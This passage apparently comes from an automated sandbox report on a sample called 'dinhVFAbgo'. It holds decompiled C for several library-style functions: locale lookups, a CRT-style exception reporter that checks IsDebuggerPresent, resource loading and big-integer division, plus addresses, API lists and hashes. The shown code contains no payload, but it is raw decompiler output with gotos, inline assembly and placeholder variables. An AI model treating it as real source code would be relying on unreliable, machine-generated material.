					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E00DF9E2F(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						__eflags =  *(_t94 + 0x60);
						if( *(_t94 + 0x60) != 0) {
							goto L36;
						}
						__eflags =  *(_t94 + 0x5c);
						if( *(_t94 + 0x5c) == 0) {
							goto L36;
						}
						__eflags = E00DF9E2F(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
						if(__eflags != 0) {
							goto L36;
						}
						_push(_t124);
						_t94 = 0;
						_t78 = E00E00590(__eflags, _t126, 0);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						__eflags = _t124[1];
						L34:
						if(_t141 == 0) {
							_t124[1] = _t126;
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						__eflags =  *(_t94 + 0x5c) - _t74;
						if( *(_t94 + 0x5c) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
							__eflags = _t80 - _v252;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						__eflags = _t122 - _v256 >> 1 -  *(_t94 + 0x5c);
						if(__eflags != 0) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						_t81 = E00E00590(__eflags, _t126, 1);
						__eflags = _t81;
						if(_t81 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t141 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E00DF9E2F(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					__eflags = _t115 & 0x00000002;
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					__eflags =  *(_t94 + 0x5c);
					if( *(_t94 + 0x5c) == 0) {
						L12:
						_t121 =  *_t124;
						__eflags = _t121 & 0x00000001;
						if((_t121 & 0x00000001) != 0) {
							goto L16;
						}
						_t90 = E00E0056B(_t126);
						__eflags = _t90;
						if(_t90 == 0) {
							goto L16;
						}
						_t121 = _t121 | 0x00000001;
						__eflags = _t121;
						 *_t124 = _t121;
						goto L15;
					}
					_t92 = E00DFAE68(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *(_t94 + 0x5c));
					_t128 = _t128 + 0xc;
					__eflags = _t92;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					__eflags =  *_t124;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
						__eflags = _t93 - _v252;
					} while (_t93 != _v252);
					__eflags = _t117 - _t121 >> 1 -  *(_t94 + 0x5c);
					if(_t117 - _t121 >> 1 ==  *(_t94 + 0x5c)) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}

0x00e00111
0x00e0011c
0x00e00123
0x00e00131
0x00e00139
0x00e00148
0x00e00154
0x00e00165
0x00e0016b
0x00e00174
0x00e0034e
0x00e00350
0x00e00352
0x00e00352
0x00e00353
0x00e00361
0x00e00361
0x00e0018d
0x00e00248
0x00e00253
0x00e00342
0x00e00349
0x00000000
0x00e00349
0x00e00267
0x00e0027d
0x00000000
0x00000000
0x00e0028d
0x00e00296
0x00e00304
0x00e00307
0x00000000
0x00000000
0x00e00309
0x00e0030c
0x00000000
0x00000000
0x00e0031f
0x00e00321
0x00000000
0x00000000
0x00e00323
0x00e00324
0x00e00328
0x00e00330
0x00e00332
0x00000000
0x00000000
0x00e00334
0x00e0033a
0x00e0033d
0x00e0033d
0x00e0033f
0x00e0033f
0x00000000
0x00e0033d
0x00e0029a
0x00e002a0
0x00e002a5
0x00e002b7
0x00e002ba
0x00000000
0x00000000
0x00e002bc
0x00e002c2
0x00e002c8
0x00e002c8
0x00e002cb
0x00e002ce
0x00e002ce
0x00e002dd
0x00e002df
0x00e002e2
0x00e002fe
0x00000000
0x00e002fe
0x00e002e4
0x00e002e8
0x00e002f0
0x00e002f2
0x00000000
0x00000000
0x00e002f4
0x00e002fa
0x00e002af
0x00e002af
0x00000000
0x00e002af
0x00e002a7
0x00e002ad
0x00000000
0x00e002ad
0x00e001a1
0x00e001b7
0x00000000
0x00000000
0x00e001c7
0x00e001ce
0x00e001d2
0x00e001e1
0x00e001e4
0x00000000
0x00000000
0x00e001e6
0x00e001ea
0x00e0022e
0x00e0022e
0x00e00230
0x00e00233
0x00000000
0x00000000
0x00e00236
0x00e0023c
0x00e0023e
0x00000000
0x00000000
0x00e00240
0x00e00240
0x00e00243
0x00000000
0x00e00243
0x00e001f9
0x00e001fe
0x00e00201
0x00e00203
0x00000000
0x00000000
0x00e00205
0x00e00205
0x00e00208
0x00e0020b
0x00e0020e
0x00e00211
0x00e00211
0x00e00214
0x00e00217
0x00e00217
0x00e00224
0x00e00227
0x00e00229
0x00e00229
0x00e001d4
0x00e001da
0x00e001dd
0x00e00245
0x00e00245
0x00e00245

APIs

Part of subcall function 00DF4B3D: GetLastError.KERNEL32(?,00000000,?,00DE30DC,00000000,00000000,?,?,00DE295D,00000000,00000000,00000000), ref: 00DF4B42
Part of subcall function 00DF4B3D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00DE295D,00000000,00000000,00000000), ref: 00DF4BE0

Part of subcall function 00DF4B3D: _free.LIBCMT ref: 00DF4B9F
Part of subcall function 00DF4B3D: _free.LIBCMT ref: 00DF4BD5

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E00165
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E001AF
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E00275

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: c3f57c8f7a69f5b3e2b73e0265cd6de845e3bb60eb3fa71db2ec444d4af579e2
Instruction ID: 69d4a49bc18543774d64f3076d667549872533bbd418563216fcdf7b666c9395
Opcode Fuzzy Hash: c3f57c8f7a69f5b3e2b73e0265cd6de845e3bb60eb3fa71db2ec444d4af579e2
Instruction Fuzzy Hash: 4F6191719102079FDB299F24CC86BBAB7A9EF04314F109179ED05EA5D6EB38E9C0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00DE216E Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00DE216E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xe68dd4; // 0x8d2643c2
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00DDDB79(_t41);
					_pop(_t61);
				}
				E00DDFBE0(_t66,  &_v804, 0, 0x50);
				E00DDFBE0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00DDDB79(_t57);
				}
				return E00DDCBCE(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00de216e
0x00de216e
0x00de216e
0x00de2179
0x00de217e
0x00de2180
0x00de2188
0x00de218a
0x00de218d
0x00de2192
0x00de2192
0x00de219e
0x00de21b1
0x00de21bf
0x00de21c5
0x00de21cb
0x00de21d1
0x00de21d7
0x00de21dd
0x00de21e3
0x00de21e9
0x00de21ef
0x00de21f5
0x00de21fc
0x00de2203
0x00de220a
0x00de2211
0x00de2218
0x00de221f
0x00de2220
0x00de2229
0x00de222f
0x00de2232
0x00de2238
0x00de2245
0x00de224e
0x00de2257
0x00de2260
0x00de226e
0x00de2270
0x00de2285
0x00de2291
0x00de2294
0x00de2299
0x00de22a6

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00DE2266
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00DE2270
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00DE227D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9aaf03820a902b5eb57f4a9849d48afba811c4266efac3d6e60372534973954a
Instruction ID: 3a4b441a978838c126804d2d81a354b7ccdbb5e30fc5f43788a296868a7bb9ec
Opcode Fuzzy Hash: 9aaf03820a902b5eb57f4a9849d48afba811c4266efac3d6e60372534973954a
Instruction Fuzzy Hash: D831B274901318ABCB21DF65DD89BDDBBB8BF18310F5041EAE40CA6260EB709B858F54

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2712 Relevance: 4.5, APIs: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CB2712(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t6;
				void* _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;

				_t13 = 0;
				_t9 = __ecx;
				_t14 = _a4;
				if(_a4 == 0) {
					L4:
					return E00CBB818(_t9, _t9, _t12, _t13, _t16, _t13);
				}
				_t12 =  *(E00CACEEE(__ecx, _t12, 0, _t14) + 0xc);
				_t6 = FindResourceA(_t12, _a4, 0xf0);
				if(_t6 == 0) {
					goto L4;
				}
				_t7 = LoadResource(_t12, _t6);
				_t16 = _t7;
				if(_t7 != 0) {
					_t13 = LockResource(_t7);
					goto L4;
				}
				return _t7;
			}

0x00cb2717
0x00cb2719
0x00cb271c
0x00cb271f
0x00cb2751
0x00000000
0x00cb2754
0x00cb272e
0x00cb2732
0x00cb273a
0x00000000
0x00000000
0x00cb273e
0x00cb2744
0x00cb2746
0x00cb274f
0x00000000
0x00cb274f
0x00cb275d

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 00CB2732
LoadResource.KERNEL32(?,00000000), ref: 00CB273E
LockResource.KERNEL32(00000000), ref: 00CB2749

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Resource$FindLoadLock
String ID:
API String ID: 2752051264-0
Opcode ID: 31cd2a4d895bc45ef755f58d936d6fbba35ba9608e3983b2abe9422e5874241c
Instruction ID: b819153a6e8b066518a657f3b59e54f362f7046ce7b9f4dc77c24d46868303e0
Opcode Fuzzy Hash: 31cd2a4d895bc45ef755f58d936d6fbba35ba9608e3983b2abe9422e5874241c
Instruction Fuzzy Hash: 7CE030312502196FA7102F65EC85ABBB76CEB45BA1B148039F915E2141CA70DC41A6F4

Uniqueness

Uniqueness Score: -1.00%

Function 00DEAA00 Relevance: 3.4, APIs: 2, Instructions: 450
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 94%

			E00DEAA00(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t190;
				signed int _t191;
				intOrPtr _t192;
				signed int _t195;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t204;
				signed int _t210;
				intOrPtr _t216;
				void* _t219;
				signed int _t221;
				signed int _t232;
				void* _t236;
				signed int _t239;
				signed int* _t244;
				signed int _t245;
				signed int* _t246;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				void* _t251;
				intOrPtr* _t252;
				signed int _t253;
				unsigned int _t254;
				signed int _t256;
				signed int* _t260;
				signed int _t261;
				signed int _t262;
				intOrPtr _t264;
				void* _t268;
				signed char _t274;
				signed int* _t277;
				signed int _t281;
				signed int* _t282;
				intOrPtr* _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t295;
				signed int _t296;
				signed int _t298;
				intOrPtr* _t299;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int _t319;
				signed int _t323;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;
				signed int _t334;
				signed int _t341;
				signed int* _t342;

				_t244 = _a4;
				_t325 =  *_t244;
				if(_t325 == 0) {
					L74:
					__eflags = 0;
					return 0;
				} else {
					_t289 = _a8;
					_t190 =  *_t289;
					_v56 = _t190;
					if(_t190 == 0) {
						goto L74;
					} else {
						_t312 = _t190 - 1;
						_t5 = _t325 - 1; // 0x1cb
						_t253 = _t5;
						_v12 = _t253;
						if(_t312 != 0) {
							__eflags = _t312 - _t253;
							if(_t312 > _t253) {
								goto L74;
							} else {
								_t191 = _t253;
								_t291 = _t253 - _t312;
								__eflags = _t253 - _t291;
								if(_t253 < _t291) {
									L19:
									_t291 = _t291 + 1;
									__eflags = _t291;
								} else {
									_t277 =  &(_t244[_t253 + 1]);
									_t341 = _a8 + _t312 * 4 + 4;
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t277;
										if(__eflags != 0) {
											break;
										}
										_t191 = _t191 - 1;
										_t341 = _t341 - 4;
										_t277 = _t277 - 4;
										__eflags = _t191 - _t291;
										if(_t191 >= _t291) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t291;
								if(__eflags == 0) {
									goto L74;
								} else {
									_t192 = _a8;
									_t245 = _v56;
									_t326 =  *(_t192 + _t245 * 4);
									_t55 = _t245 * 4; // 0xfffe676d
									_t254 =  *(_t192 + _t55 - 4);
									asm("bsr eax, esi");
									_v52 = _t326;
									_v36 = _t254;
									if(__eflags == 0) {
										_t313 = 0x20;
									} else {
										_t313 = 0x1f - _t192;
									}
									_v16 = _t313;
									_v48 = 0x20 - _t313;
									__eflags = _t313;
									if(_t313 != 0) {
										_t274 = _t313;
										_v36 = _v36 << _t274;
										_v52 = _t326 << _t274 | _t254 >> _v48;
										__eflags = _t245 - 2;
										if(_t245 > 2) {
											_t68 = _t245 * 4; // 0xe850ffff
											_t70 =  &_v36;
											 *_t70 = _v36 |  *(_a8 + _t68 - 8) >> _v48;
											__eflags =  *_t70;
										}
									}
									_t327 = 0;
									_v32 = 0;
									_t292 = _t291 + 0xffffffff;
									__eflags = _t292;
									_v28 = _t292;
									if(_t292 >= 0) {
										_t197 = _t292 + _t245;
										_t247 = _a4;
										_v60 = _t197;
										_v64 = _t247 + 4 + _t292 * 4;
										_t260 = _t247 - 4 + _t197 * 4;
										_v80 = _t260;
										do {
											__eflags = _t197 - _v12;
											if(_t197 > _v12) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 = _t260[2];
											}
											_t296 = _t260[1];
											_t261 =  *_t260;
											_v76 = _t198;
											_v40 = 0;
											_v8 = _t198;
											_v24 = _t261;
											__eflags = _t313;
											if(_t313 != 0) {
												_t303 = _v8;
												_t319 = _t261 >> _v48;
												_t221 = E00E07000(_t296, _v16, _t303);
												_t261 = _v16;
												_t198 = _t303;
												_t296 = _t319 | _t221;
												_t327 = _v24 << _t261;
												__eflags = _v60 - 3;
												_v8 = _t303;
												_v24 = _t327;
												if(_v60 >= 3) {
													_t261 = _v48;
													_t327 = _t327 |  *(_t247 + (_v56 + _v28) * 4 - 8) >> _t261;
													__eflags = _t327;
													_t198 = _v8;
													_v24 = _t327;
												}
											}
											_push(_t247);
											_t199 = E00E06F60(_t296, _t198, _v52, 0);
											_v40 = _t247;
											_t249 = _t199;
											_t328 = _t327 ^ _t327;
											_t200 = _t296;
											_v8 = _t249;
											_v20 = _t200;
											_t314 = _t261;
											_v72 = _t249;
											_v68 = _t200;
											_v40 = _t328;
											__eflags = _t200;
											if(_t200 != 0) {
												L37:
												_t250 = _t249 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E00DDD980(_t250, _t200, _v52, 0);
												asm("adc esi, edx");
												_t249 = _t250 | 0xffffffff;
												_t200 = 0;
												__eflags = 0;
												_v40 = _t328;
												_v8 = _t249;
												_v72 = _t249;
												_v20 = 0;
												_v68 = 0;
											} else {
												__eflags = _t249 - 0xffffffff;
												if(_t249 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t328;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L41;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L41:
															_v8 = _v24;
															_t219 = E00DDD980(_v36, 0, _t249, _t200);
															__eflags = _t296 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L44:
																_t200 = _v20;
																_t249 = _t249 + 0xffffffff;
																_v72 = _t249;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v52;
																__eflags = _t314;
																_v20 = _t200;
																asm("adc dword [ebp-0x24], 0x0");
																_v68 = _t200;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t219 - _v8;
																if(_t219 <= _v8) {
																	break;
																} else {
																	goto L44;
																}
															}
															L48:
															_v8 = _t249;
															goto L49;
														}
														_t200 = _v20;
														goto L48;
													}
												}
											}
											L49:
											__eflags = _t200;
											if(_t200 != 0) {
												L51:
												_t262 = _v56;
												_t315 = 0;
												_t329 = 0;
												__eflags = _t262;
												if(_t262 != 0) {
													_t252 = _v64;
													_t210 = _a8 + 4;
													__eflags = _t210;
													_v40 = _t210;
													_v24 = _t262;
													do {
														_v12 =  *_t210;
														_t216 =  *_t252;
														_t268 = _t315 + _v72 * _v12;
														asm("adc esi, edx");
														_t315 = _t329;
														_t329 = 0;
														__eflags = _t216 - _t268;
														if(_t216 < _t268) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t252 = _t216 - _t268;
														_t252 = _t252 + 4;
														_t210 = _v40 + 4;
														_t153 =  &_v24;
														 *_t153 = _v24 - 1;
														__eflags =  *_t153;
														_v40 = _t210;
													} while ( *_t153 != 0);
													_t249 = _v8;
													_t262 = _v56;
												}
												__eflags = 0 - _t329;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L60:
														__eflags = _t262;
														if(_t262 != 0) {
															_t251 = 0;
															_t299 = _v64;
															_t334 = _a8 + 4;
															__eflags = _t334;
															_t316 = _t262;
															do {
																_t264 =  *_t299;
																_t161 = _t334 + 4; // 0x8d8b5959
																_t334 = _t161;
																_t299 = _t299 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t299 - 4)) = _t264 +  *((intOrPtr*)(_t334 - 4)) + _t251;
																asm("adc eax, 0x0");
																_t251 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t249 = _v8;
														}
														_t249 = _t249 + 0xffffffff;
														asm("adc dword [ebp-0x10], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L60;
														}
													}
												}
												_t204 = _v60 - 1;
												__eflags = _t204;
												_v12 = _t204;
											} else {
												__eflags = _t249;
												if(_t249 != 0) {
													goto L51;
												}
											}
											_t327 = _v32;
											_t247 = _a4;
											asm("adc esi, 0x0");
											_v64 = _v64 - 4;
											_t298 = _v28 - 1;
											_t313 = _v16;
											_t260 = _v80 - 4;
											_v32 = 0 + _t249;
											_t197 = _v60 - 1;
											_v28 = _t298;
											_v60 = _t197;
											_v80 = _t260;
											__eflags = _t298;
										} while (_t298 >= 0);
									}
									_t246 = _a4;
									_t256 = _v12 + 1;
									_t195 = _t256;
									__eflags = _t195 -  *_t246;
									if(_t195 <  *_t246) {
										_t295 =  &(( &(_t246[1]))[_t195]);
										do {
											 *_t295 = 0;
											_t295 =  &(_t295[1]);
											_t195 = _t195 + 1;
											__eflags = _t195 -  *_t246;
										} while (_t195 <  *_t246);
									}
									 *_t246 = _t256;
									__eflags = _t256;
									if(_t256 != 0) {
										while(1) {
											__eflags = _t246[_t256];
											if(_t246[_t256] != 0) {
												goto L73;
											}
											_t256 = _t256 + 0xffffffff;
											__eflags = _t256;
											 *_t246 = _t256;
											if(_t256 != 0) {
												continue;
											}
											goto L73;
										}
									}
									L73:
									return _v32;
								}
							}
						} else {
							_t7 = _t289 + 4; // 0xfffff89c
							_t304 =  *_t7;
							_v12 = _t304;
							if(_t304 != 1) {
								__eflags = _t253;
								if(_t253 != 0) {
									_t323 = 0;
									_v16 = 0;
									_v40 = 0;
									_v28 = 0;
									__eflags = _t253 - 0xffffffff;
									if(_t253 != 0xffffffff) {
										_t281 = _t253 + 1;
										__eflags = _t281;
										_t282 =  &(_t244[_t281]);
										_v32 = _t282;
										do {
											_t236 = E00E06F60( *_t282, _t323, _t304, 0);
											_v28 = _t244;
											_t244 = _t244;
											_v68 = _t304;
											_t323 = _t282;
											_v16 = 0 + _t236;
											_t304 = _v12;
											asm("adc ecx, 0x0");
											_v40 = _v16;
											_t282 = _v32 - 4;
											_v32 = _t282;
											_t325 = _t325 - 1;
											__eflags = _t325;
										} while (_t325 != 0);
										_t244 = _a4;
									}
									_v544 = 0;
									_t342 =  &(_t244[1]);
									 *_t244 = 0;
									E00DE686E(_t342, 0x1cc,  &_v540, 0);
									_t232 = _v28;
									__eflags = 0 - _t232;
									 *_t342 = _t323;
									_t244[2] = _t232;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t244 = 0xbadbae;
									return _v16;
								} else {
									_t324 =  &(_t244[1]);
									_v544 = _t253;
									 *_t244 = _t253;
									E00DE686E(_t324, 0x1cc,  &_v540, _t253);
									_t239 = _t244[1];
									_t309 = _t239 % _v12;
									__eflags = 0 - _t309;
									 *_t324 = _t309;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t244 =  ~0x00000000;
									return _t239 / _v12;
								}
							} else {
								_v544 = _t312;
								 *_t244 = _t312;
								E00DE686E( &(_t244[1]), 0x1cc,  &_v540, _t312);
								return _t244[1];
							}
						}
					}
				}
			}

0x00deaa0c
0x00deaa11
0x00deaa15
0x00deae8f
0x00deae91
0x00deae97
0x00deaa1b
0x00deaa1b
0x00deaa1e
0x00deaa20
0x00deaa25
0x00000000
0x00deaa2b
0x00deaa2b
0x00deaa2e
0x00deaa2e
0x00deaa31
0x00deaa36
0x00deab67
0x00deab69
0x00000000
0x00deab6f
0x00deab71
0x00deab73
0x00deab75
0x00deab77
0x00deab9b
0x00deab9b
0x00deab9b
0x00deab79
0x00deab80
0x00deab83
0x00deab83
0x00deab86
0x00deab88
0x00deab8a
0x00000000
0x00000000
0x00deab8c
0x00deab8d
0x00deab90
0x00deab93
0x00deab95
0x00000000
0x00deab97
0x00000000
0x00deab97
0x00000000
0x00deab95
0x00deab99
0x00000000
0x00000000
0x00deab99
0x00deab9c
0x00deab9c
0x00deab9e
0x00000000
0x00deaba4
0x00deaba4
0x00deaba7
0x00deabaa
0x00deabad
0x00deabad
0x00deabb1
0x00deabb4
0x00deabb7
0x00deabba
0x00deabc5
0x00deabbc
0x00deabc1
0x00deabc1
0x00deabcf
0x00deabd4
0x00deabd7
0x00deabd9
0x00deabe2
0x00deabe4
0x00deabeb
0x00deabee
0x00deabf1
0x00deabf9
0x00deabff
0x00deabff
0x00deabff
0x00deabff
0x00deabf1
0x00deac02
0x00deac04
0x00deac0b
0x00deac0b
0x00deac0e
0x00deac11
0x00deac17
0x00deac1a
0x00deac1d
0x00deac26
0x00deac2c
0x00deac2f
0x00deac32
0x00deac32
0x00deac35
0x00deac3c
0x00deac3c
0x00deac37
0x00deac37
0x00deac37
0x00deac3e
0x00deac41
0x00deac43
0x00deac46
0x00deac4d
0x00deac50
0x00deac53
0x00deac55
0x00deac60
0x00deac63
0x00deac68
0x00deac6d
0x00deac74
0x00deac79
0x00deac7b
0x00deac7d
0x00deac81
0x00deac84
0x00deac87
0x00deac8f
0x00deac98
0x00deac98
0x00deac9a
0x00deac9d
0x00deac9d
0x00deac87
0x00deaca0
0x00deaca8
0x00deacad
0x00deacb2
0x00deacb4
0x00deacb6
0x00deacb8
0x00deacbb
0x00deacbe
0x00deacc0
0x00deacc3
0x00deacc6
0x00deacc9
0x00deaccb
0x00deacd2
0x00deacd7
0x00deacda
0x00deace4
0x00deace6
0x00deace8
0x00deaceb
0x00deaceb
0x00deaced
0x00deacf0
0x00deacf3
0x00deacf6
0x00deacf9
0x00deaccd
0x00deaccd
0x00deacd0
0x00000000
0x00000000
0x00deacd0
0x00deacfc
0x00deacfe
0x00dead00
0x00000000
0x00dead02
0x00dead02
0x00dead05
0x00dead07
0x00dead07
0x00dead15
0x00dead18
0x00dead1d
0x00dead1f
0x00000000
0x00000000
0x00dead21
0x00dead28
0x00dead28
0x00dead2b
0x00dead2e
0x00dead31
0x00dead34
